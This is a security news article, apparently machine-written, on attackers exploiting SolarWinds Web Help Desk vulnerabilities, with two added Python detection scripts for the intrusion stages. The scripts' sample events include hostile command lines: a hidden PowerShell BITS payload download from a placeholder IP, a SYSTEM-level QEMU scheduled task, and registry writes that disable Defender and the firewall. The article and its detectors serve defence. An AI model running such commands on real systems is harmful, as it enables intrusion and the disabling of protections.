Ethical Hacking News
SolarWinds Web Help Desk (WHD) instances have been exploited by threat actors for remote code execution (RCE) in a multistage attack on corporate networks. Microsoft's security research team has observed WHD vulnerabilities (CVE-2025-40551 and CVE-2025-26399) being used to gain initial access, move laterally across the network, and establish persistence. The intruders relied on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms, and carried out credential theft by dumping the contents of LSASS memory with a rogue DLL. Huntress separately reported a similar attack on February 7, 2026, in which Zoho Meetings and Cloudflare tunnels were used for persistence and the legitimate forensics tool Velociraptor for command-and-control (C2). Users are advised to keep their WHD instances up-to-date, remove unauthorized RMM tools, rotate service accounts, and isolate compromised machines to limit the breach.
Web Help Desk (WHD), a help desk product from IT management software vendor SolarWinds, has been exploited by threat actors to gain remote code execution (RCE) and move laterally across corporate networks. According to Microsoft's security research team, the attack involved exploiting vulnerabilities in exposed WHD instances to obtain initial access and escalate privileges.
The attack began with an unauthenticated remote code execution vulnerability (CVE-2025-40551) in the WHD instance, which allowed attackers to run arbitrary commands within the application context. The compromised service then spawned PowerShell to leverage BITS (Background Intelligent Transfer Service) for payload download and execution.
Threat actors followed up with a series of actions to establish persistence and move laterally across the network. They enumerated sensitive domain users and groups, including Domain Admins, and established persistence via reverse SSH and RDP access. The attackers also attempted to create scheduled tasks to launch a QEMU virtual machine under the SYSTEM account at system startup.
Furthermore, threat actors used DLL side-loading on some hosts using "wab.exe," a legitimate system executable associated with the Windows Address Book, to launch a rogue DLL ("sspicli.dll") and dump the contents of LSASS memory. This allowed them to conduct credential theft.
In at least one case the intrusion also included a DCSync attack, in which the attacker impersonates a Domain Controller (DC) to request password hashes and other sensitive information from the Active Directory (AD) database.
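Detection logic for the stages just described, as an added example that is not code from the page, from Microsoft or from SolarWinds: four rules run over constructed Sysmon- and Security-log-style events (process creation, image load, and Event ID 4662 directory-service access). The WHD install path, host names and sample command lines are assumptions; the replication-right GUIDs are the standard Active Directory control-access rights that a DCSync request exercises.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events (not real telemetry). Sysmon EID 1 = process create,
# EID 7 = image load; 4662 = Security log directory-service object access.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "host": "whd01", "parent": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",  # assumed WHD path
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden Start-BitsTransfer -Source http://198.51.100.7/a.dat -Destination C:\\Users\\Public\\a.dat"},
    {"id": 7, "host": "ws07", "image": r"C:\Windows\System32\wab.exe", "loaded": r"C:\Users\Public\sspicli.dll"},
    {"id": 1, "host": "ws07", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn Updater /sc onstart /ru SYSTEM /tr "C:\ProgramData\q\qemu-system-x86_64.exe -hda d.qcow2"'},
    {"id": 4662, "host": "dc01", "subject": r"CORP\svc-helpdesk", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 7, "host": "ws08", "image": r"C:\Windows\System32\wab.exe", "loaded": r"C:\Windows\System32\sspicli.dll"},  # benign
]

# Control-access rights a DC needs for replication; a user account exercising them is DCSync-like.
DCSYNC_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
                "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}   # DS-Replication-Get-Changes-All
BITS_RE = re.compile(r"start-bitstransfer|bitsadmin", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events: List[Dict]) -> List[Tuple[str, str]]:
    """Return (rule_name, host) for every event matching a stage of the WHD intrusion chain."""
    hits = []
    for e in events:
        if e["id"] == 1:
            parent, image, cmd = e.get("parent", ""), e["image"], e.get("cmdline", "")
            # Stage 1: the WHD Java service spawning PowerShell that drives a BITS download.
            if "webhelpdesk" in parent.lower() and _base(image) == "powershell.exe" and BITS_RE.search(cmd):
                hits.append(("whd_spawns_bits_download", e["host"]))
            # Stage 2: a scheduled task that starts QEMU as SYSTEM.
            if _base(image) == "schtasks.exe" and "qemu" in cmd.lower() and re.search(r"/ru\s+system", cmd, re.I):
                hits.append(("qemu_task_as_system", e["host"]))
        elif e["id"] == 7:
            # Stage 3: wab.exe loading sspicli.dll from outside the system directories is side-loading.
            if _base(e["image"]) == "wab.exe" and _base(e["loaded"]) == "sspicli.dll" \
                    and not e["loaded"].lower().startswith(SYSTEM_DIRS):
                hits.append(("wab_sideloads_sspicli", e["host"]))
        elif e["id"] == 4662:
            # Stage 4: replication rights requested by a non-machine account (machine accounts end in "$").
            guids = set(re.findall(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", e["properties"].lower()))
            if guids & DCSYNC_GUIDS and not e["subject"].endswith("$"):
                hits.append(("dcsync_replication_request", e["host"]))
    return hits
```

The benign ws08 event (sspicli.dll loaded from System32) must produce no alert; in production the rules would read from your SIEM rather than an inline list.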
Microsoft advises users to keep WHD instances up-to-date, find and remove any unauthorized RMM tools, rotate service and admin accounts, and isolate compromised machines to limit the breach. This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored.
The use of living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms by threat actors reinforces the importance of defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers.
According to Huntress researchers, a similar attack was detected on February 7, 2026, where the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as a legitimate forensics tool called Velociraptor for command-and-control (C2). The incident involved launching "cmd.exe" to install a remote MSI payload associated with Zoho ManageEngine RMM, establishing remote access by configuring the Zoho Assist agent for unattended access, and registering the compromised host to a Zoho Assist account tied to a Proton Mail address.
The threat actors also leveraged the Zoho Assist remote session to deploy Velociraptor version 0.73.4, an outdated version with a known privilege escalation vulnerability (CVE-2025-6264), and used the Velociraptor agent to execute PowerShell commands that check for the presence of "code.exe," a Visual Studio Code binary, likely with the intent of establishing a remote tunnel.
The attackers also installed Cloudflared to establish an additional tunnel-based channel for redundant access to the compromised host. They executed a PowerShell script that collects comprehensive system information and transmits it directly to an attacker-controlled Elastic Cloud instance.
In another case, threat actors disabled Windows Defender and Windows Firewall via Registry modifications. They also executed a script that implements a live C2 failover mechanism for the Velociraptor agent, pointing it to a different server ("v2-api.mooo[.]com") should the original Cloudflare workers[.]dev domain be detected.
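For the Registry-based tampering mentioned above, an added example that is not code from the page or from Huntress: it parses constructed Sysmon Event ID 13 (registry value set) records in Event Log XML shape and flags writes that switch Defender or the Windows Firewall off. The page does not say which values were modified; matching the standard Defender policy values and the FirewallPolicy profile's EnableFirewall value is an assumption, and the Event Log XML namespace is omitted from the sample.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed Sysmon EID 13 records in Event Log XML shape (sample data, not
# real telemetry; the Event Log XML namespace is omitted for brevity).
SAMPLE_XML = r"""<Events>
<Event><System><EventID>13</EventID></System><EventData>
  <Data Name="Image">C:\Windows\System32\reg.exe</Data>
  <Data Name="TargetObject">HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware</Data>
  <Data Name="Details">DWORD (0x00000001)</Data></EventData></Event>
<Event><System><EventID>13</EventID></System><EventData>
  <Data Name="Image">C:\Windows\System32\reg.exe</Data>
  <Data Name="TargetObject">HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall</Data>
  <Data Name="Details">DWORD (0x00000000)</Data></EventData></Event>
<Event><System><EventID>13</EventID></System><EventData>
  <Data Name="Image">C:\Windows\System32\svchost.exe</Data>
  <Data Name="TargetObject">HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall</Data>
  <Data Name="Details">DWORD (0x00000001)</Data></EventData></Event>
</Events>"""

# value name -> (key fragment that must appear in the path, DWORD value that turns protection off)
TAMPER_VALUES = {
    "disableantispyware": ("windows defender", 1),
    "disablerealtimemonitoring": ("windows defender", 1),
    "enablefirewall": ("firewallpolicy", 0),
}
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]+)\)")

def registry_tamper_hits(xml_text: str) -> List[Tuple[str, str, str]]:
    """Return (value_name, writing_image, target_path) for EID 13 writes that disable protection."""
    hits = []
    for ev in ET.fromstring(xml_text).iter("Event"):
        if ev.findtext("System/EventID") != "13":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.iter("Data")}
        target = data.get("TargetObject", "")
        name = target.rsplit("\\", 1)[-1].lower()
        if name not in TAMPER_VALUES:
            continue
        key_frag, off_value = TAMPER_VALUES[name]
        m = DWORD_RE.search(data.get("Details", ""))
        # Writes that re-enable protection (e.g. EnableFirewall set back to 1) are not tampering.
        if key_frag in target.lower() and m and int(m.group(1), 16) == off_value:
            hits.append((name, data.get("Image", ""), target))
    return hits
```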
In the WHD intrusions, the scheduled tasks that launched QEMU served to open an SSH backdoor as a persistence mechanism, alongside the wab.exe side-loading of the rogue "sspicli.dll" for LSASS credential theft described above.
Related Information:
https://www.ethicalhackingnews.com/articles/SolarWinds-Web-Help-Desk-Exploited-for-Remote-Code-Execution-A-Multistage-Attack-on-Corporate-Networks-ehn.shtml
https://thehackernews.com/2026/02/solarwinds-web-help-desk-exploited-for.html
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://www.cvedetails.com/cve/CVE-2025-40551/
https://nvd.nist.gov/vuln/detail/CVE-2025-6264
https://www.cvedetails.com/cve/CVE-2025-6264/
https://attack.mitre.org/campaigns/C0024/
https://www.bentleybiosec.com/thesolarwindshackapt29
https://learn.microsoft.com/en-us/unified-secops/microsoft-threat-actor-naming
https://thehackernews.com/2026/02/apt28-uses-microsoft-office-cve-2026.html
Published: Thu Feb 19 00:00:48 2026 by llama3.2 3B Q4_K_M